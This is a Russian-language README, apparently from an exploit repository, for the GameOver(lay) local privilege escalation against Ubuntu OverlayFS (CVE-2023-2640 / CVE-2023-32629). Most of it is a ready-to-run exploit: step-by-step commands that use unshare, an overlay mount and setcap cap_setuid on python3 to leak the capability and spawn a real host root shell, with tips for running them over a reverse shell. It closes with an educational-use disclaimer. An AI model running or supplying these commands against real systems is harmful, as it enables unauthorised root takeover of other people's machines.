
Чистый интерактивный многоэтапный эксплойт локального повышения привилегий (LPE) для Ubuntu OverlayFS (GameOver(lay)), который выходит из песочницы пользовательского пространства имён, чтобы получить настоящую root-оболочку хоста.
Интерактивный многоэтапный Proof of Concept (PoC) локального повышения привилегий (LPE), нацеленный на уязвимости OverlayFS в ядре Ubuntu Linux (CVE-2023-2640 / CVE-2023-32629).
В отличие от стандартных автоматических однострочников, которые запирают вашу интерактивную оболочку внутри ограниченного пользовательского пространства имён (Fake Root), данная методика разделяет последовательность эксплойта, чтобы безопасно получить настоящую, неограниченную root-оболочку хоста.
Многие публичные эксплойты объединяют настройку и выполнение в единую автоматизированную последовательность команд оболочки, например:
unshare -rm sh -c "mkdir l u w m && ... && touch m/*; python3 -c '...'"
Поскольку исполняемая нагрузка Python находится внутри двойных кавычек команды unshare, она выполняется внутри песочницы пользовательского пространства имён.
uid=0(root), но ваша оболочка криптографически изолирована от хоста. Если вы попытаетесь просмотреть корневой каталог хоста (cd /root), вы получите ошибку Permission Denied.Этот PoC разделяет процесс на два отдельных логических этапа:
unshare, чтобы подделать root-права ровно настолько, насколько нужно для эксплуатации дефекта ovl_copy_up в OverlayFS, добившись утечки высокопривилегированной возможности setcap cap_setuid+eip в локальную папку с бинарником Python.os.setuid(0) и предоставляет вам настоящие привилегии системного администратора уровня хоста.ovl_copy_up_meta_inode_data ядра Ubuntu, позволяющий полностью обойти проверки валидации при миграции файлов.6.2.0-26-generic.exploit.sh на целевую машину (например, в /tmp).chmod +x exploit.sh
./exploit.sh
Если вы работаете через нестабильный reverse shell, выполняйте эти команды по отдельности, нажимая Enter после каждой строки:
# 1. Clean workspace environment
cd /tmp && rm -rf l u w m
# 2. Forge the backdoor within the temporary namespace sandbox
unshare -rm sh -c "mkdir l u w m && cp /usr/bin/python3 l/ && setcap cap_setuid+eip l/python3 && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*"
# 3. Trigger execution on the real host to claim true root
./u/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Проверьте свои реальные привилегии, посмотрев текущий профиль пользователя:
whoami
cat /root/root.txt
Базовые механизмы эксплойта, использованные в этой интерактивной доработке, были первоначально обнаружены и задокументированы исследователями безопасности Liav Eliyahu и g1vi.
Этот репозиторий создан строго в образовательных целях, для исследований в области безопасности и авторизованного тестирования на проникновение (например, лаборатории HackTheBox / OffSec). Автор не несёт ответственности за неправомерное использование, попытки несанкционированного доступа или ущерб инфраструктуре, причинённый данными материалами. Используйте ответственно.